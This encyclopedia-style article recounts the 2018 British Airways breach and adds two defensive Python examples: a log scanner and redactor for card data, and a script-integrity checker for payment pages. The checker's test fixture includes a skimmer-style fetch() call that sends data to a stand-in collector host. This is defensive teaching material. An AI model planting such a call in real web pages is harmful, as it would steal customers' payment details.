British Airways data breach

In summer 2018, a data breach affected almost 500,000 customers of British Airways (BA), of whom almost 250,000 had their names, addresses, payment card numbers and CVV codes stolen. The attacker gained access to British Airways' systems through the compromised account of a third-party employee and escalated their privileges after finding an administrator password stored in plaintext. The attacker stole payment card data that British Airways had been improperly logging, and also redirected users of the British Airways website to a bogus site designed to steal more data. In October 2020 the ICO fined British Airways £20 million for breaches of the GDPR related to the incident.

Attack

On 22 June 2018, an attacker gained access to British Airways' network using compromised credentials belonging to an employee of Swissport, a third-party cargo handler.[1] The compromised account did not have multi-factor authentication enabled.[1]

The attacker was initially confined to a Citrix environment, but broke out of it by means that BA has not disclosed.[1] Having broken out of the environment, the attacker escalated their privileges after finding an administrator password stored in plaintext on a server.[1]

On 26 July 2018, the attacker found plaintext files containing payment card details for BA redemption transactions. The ICO's report highlighted this as follows:

The logging and storing of these card details (including, in most cases, CVV numbers) was not an intended design feature of BA's systems and was not required for any particular business purpose. It was a testing feature that was only intended to operate when the systems were not live, but which was left activated when the systems went live. BA has explained that this card data was being stored in plaintext (as opposed to in encrypted form) as a result of human error. This error meant that the system had been unnecessarily logging payment card details since December 2015.

The impact of this failure was mitigated to some extent by the fact that the retention period of the logs was 95 days, which meant that the only accessible card details were those logged within the preceding 95 days. Nevertheless, the details of approximately 108,000 payment cards were potentially available to the Attacker.[1]
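The failure the ICO describes is a debug feature writing full card numbers and CVVs into ordinary application logs for years. Two checks a practitioner wants against that are a scanner that finds card data already sitting in logs, and a logging filter that scrubs it before it is written. The following is an added example and not BA's code or anything from the ICO report: the log lines, the JSON-style payload and the field name `cvv` are constructed for illustration, and the detector relies on the standard Luhn checksum rather than on any BA-specific format.

```python
"""Find and redact payment card data in application logs (added example).

Constructed sample log lines stand in for the debug logging described above;
the payload format and field names are assumptions, not BA's real format.
"""
import io
import logging
import re
from typing import Iterable

# A run of 13-19 digits, tolerating the spaces or dashes users type into forms.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
# A 3-4 digit value labelled as a card security code in key=value or JSON logs.
CVV_FIELD = re.compile(
    r"""(?i)(?P<key>\b(?:cvv2?|cvc|csc|security_?code)["']?\s*[:=]\s*["']?)(?P<val>\d{3,4})\b"""
)


def luhn_ok(digits: str) -> bool:
    """True if the digit string passes the Luhn checksum used by card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_pans(line: str) -> list[str]:
    """Return every Luhn-valid card number in a line, separators stripped."""
    pans = []
    for m in PAN_CANDIDATE.finditer(line):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            pans.append(digits)
    return pans


def mask_pan(digits: str) -> str:
    """Keep the first six and last four digits (the usual PCI DSS display rule)."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def redact_line(line: str) -> str:
    """Mask Luhn-valid PANs and blank out labelled security codes."""
    def _mask(m: re.Match) -> str:
        digits = re.sub(r"[ -]", "", m.group(0))
        return mask_pan(digits) if luhn_ok(digits) else m.group(0)
    line = PAN_CANDIDATE.sub(_mask, line)
    return CVV_FIELD.sub(lambda m: m.group("key") + "[REDACTED]", line)


def scan_log(lines: Iterable[str]) -> list[dict]:
    """Report which lines contain card numbers and/or a security code."""
    findings = []
    for n, line in enumerate(lines, start=1):
        pans = find_pans(line)
        has_cvv = CVV_FIELD.search(line) is not None
        if pans or has_cvv:
            findings.append({"line": n, "pans": pans, "cvv_present": has_cvv})
    return findings


class CardDataRedactor(logging.Filter):
    """Logging filter that scrubs records before any handler writes them."""
    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact_line(record.getMessage())
        record.args = ()
        return True


def log_through_redactor(messages: Iterable[str]) -> list[str]:
    """Write messages through a logger fitted with the filter; return what was written."""
    buf = io.StringIO()
    handler = logging.StreamHandler(buf)
    handler.addFilter(CardDataRedactor())
    logger = logging.getLogger("payments-demo")
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    logger.handlers = [handler]
    for msg in messages:
        logger.debug(msg)
    handler.flush()
    return buf.getvalue().splitlines()


# Constructed log lines: not from BA's systems. Line 4 holds a 13-digit order
# number that fails Luhn, so it must not be reported as a card number.
SAMPLE_LOG = [
    '2018-08-30 10:14:02 INFO redemption txn=7781 status=ok',
    '2018-08-30 10:14:02 DEBUG payload={"pan":"4111 1111 1111 1111","exp":"09/20","cvv":"123"}',
    '2018-08-30 10:15:11 DEBUG payload={"pan":"5500000000000004","exp":"01/21","cvv":"999"}',
    '2018-08-30 10:16:40 INFO order 1234567890123 dispatched',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: PANs={f['pans']} cvv={f['cvv_present']}")
    for out in log_through_redactor(SAMPLE_LOG):
        print(out)
```

The scanner is what you would run over the 95 days of retained logs to size an exposure like the one above; the filter is the control that should have been on the live system, attached to every handler so that a test feature left enabled cannot write a full PAN or CVV to disk regardless of which code path calls the logger.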

From 21 August 2018, the attacker redirected visitors to BA's website, by way of malicious code planted on the site, to a bogus site under the attacker's control. This site skimmed the customers' payment details and then passed them on to BA's own site. The bogus site remained active until 5 September.[2][1]

On 5 September 2018 a third party informed BA of the bogus site. Within 90 minutes the malicious code had been removed from BA's site. On 6 September BA informed the ICO and the 500,000 affected customers.[1]
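The skimmer ran for more than two weeks and was only noticed when an outside party reported the bogus site, which points to the check a payment-page operator wants in place: a baseline of which scripts the page loads, what each one hashes to, and which hosts they are allowed to reference, re-checked on a schedule. The following is an added example, not BA's code and not a reconstruction of the actual modified script; the page HTML, script bodies, allowed hosts and the collector hostname are all constructed for illustration.

```python
"""Integrity and exfil-host check for the scripts on a payment page (added example).

Everything below (HTML, script bodies, hostnames) is constructed; the real
incident's site and script are not reproduced here.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the payment page is expected to load scripts from or talk to (constructed).
ALLOWED_HOSTS = {"www.example-airline.test", "static.example-airline.test"}
URL_IN_SCRIPT = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""
    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_inline = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf).strip())
            self._in_inline = False


def audit_page(html: str, fetched: dict[str, str], baseline: dict[str, str]) -> list[str]:
    """Return findings; an empty list means the page matches its baseline.

    fetched  maps each external script URL to the body a fetcher retrieved.
    baseline maps script URLs (and "inline:<n>" keys) to their known-good sha256.
    """
    p = ScriptCollector()
    p.feed(html)
    findings: list[str] = []
    for src in p.external:
        host = urlparse(src).netloc
        if host and host not in ALLOWED_HOSTS:
            findings.append(f"script loaded from unexpected host: {src}")
        body = fetched.get(src)
        if body is None:
            findings.append(f"no fetched body for {src}")
            continue
        if baseline.get(src) != sha256(body):
            findings.append(f"hash mismatch for {src}")
        # A first-party script that has grown a reference to a foreign host is
        # the signature of a skimmer: the data has to go somewhere.
        for ref_host in URL_IN_SCRIPT.findall(body):
            if ref_host not in ALLOWED_HOSTS:
                findings.append(f"{src} references unexpected host {ref_host}")
    for n, body in enumerate(p.inline):
        if baseline.get(f"inline:{n}") != sha256(body):
            findings.append(f"inline script {n} differs from baseline")
    return findings


# Constructed fixtures: a clean vendor script and a tampered copy that adds a
# call to a collector host the page should never contact.
GOOD_VENDOR = "window.vendorReady = true;"
TAMPERED_VENDOR = GOOD_VENDOR + ' fetch("https://collector.invalid/c", {method: "POST"});'
INLINE_BOOT = "window.bootPayments();"
VENDOR_URL = "https://static.example-airline.test/js/vendor.js"
PAGE = (
    '<html><body><form id="pay"></form>'
    f'<script src="{VENDOR_URL}"></script>'
    f"<script>{INLINE_BOOT}</script></body></html>"
)
BASELINE = {VENDOR_URL: sha256(GOOD_VENDOR), "inline:0": sha256(INLINE_BOOT)}


def check_clean() -> list[str]:
    return audit_page(PAGE, {VENDOR_URL: GOOD_VENDOR}, BASELINE)


def check_tampered() -> list[str]:
    return audit_page(PAGE, {VENDOR_URL: TAMPERED_VENDOR}, BASELINE)


if __name__ == "__main__":
    print("clean:", check_clean())
    print("tampered:", check_tampered())
```

Run from a host outside the web tier (so it sees what customers see) and alert on any non-empty result; the same baseline hashes can be published as Subresource Integrity attributes on the page so that a browser refuses a modified script outright. The hash check catches a modified first-party file even when nothing new is loaded, which is the case a script-allowlist alone misses.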

British Airways said the attack affected bookings made between 21 August and 5 September 2018, with the payment card details of around 380,000 customers compromised.[3] The attacker obtained names, street addresses, email addresses, card numbers, expiry dates and card security codes – enough to allow thieves to make fraudulent charges.[3] BA's subsequent investigation found that 77,000 customers had their name, address, email address and detailed payment information taken, while 108,000 people had personal details compromised that did not include CVV numbers.[4]

Aftermath

Of the 500,000 victims of the breach, 250,000 had their names, addresses, card numbers and CVV numbers taken. The remaining victims lost less sensitive personal information.[1]

British Airways urged customers to contact their banks or credit card issuer and to follow their advice.[3] NatWest said that it received more calls than usual because of the breach.[3] American Express said that customers would not need to take any action and that they would alert customers with unusual activity on their cards.[3]

Consequences for British Airways

In October 2020 British Airways was fined £20 million by the Information Commissioner's Office.[5]

References

  1. ICO. "ICO - action we've taken - BA" (PDF).
  2. Wittkop, Jeremy (10 March 2022). The Cybersecurity Playbook for Modern Enterprises: An end-to-end guide to preventing data breaches and cyber attacks. Packt Publishing Ltd. ISBN 978-1-80323-755-8.
  3. Sandle, Paul (6 September 2018). "BA apologizes after 380,000 customers hit in cyber attack". Reuters.
  4. "BA investigation into website hack reveals more victims". BBC News. 25 October 2018. Retrieved 4 November 2022.
  5. Tidy, Joe (16 October 2020). "British Airways fined £20m over data breach". BBC News. Retrieved 16 October 2020.